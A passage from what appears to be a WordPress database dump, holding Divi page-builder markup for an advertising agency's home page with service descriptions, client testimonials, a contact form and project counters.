lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-03-22 11:24:11','2021-03-22 11:24:11','',134,'https://wthtest1.in8.cdn-alpha.com/134-revision-v1/',0,'revision','',0),(792,1,'2021-03-22 11:52:41','2021-03-22 11:52:41','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" 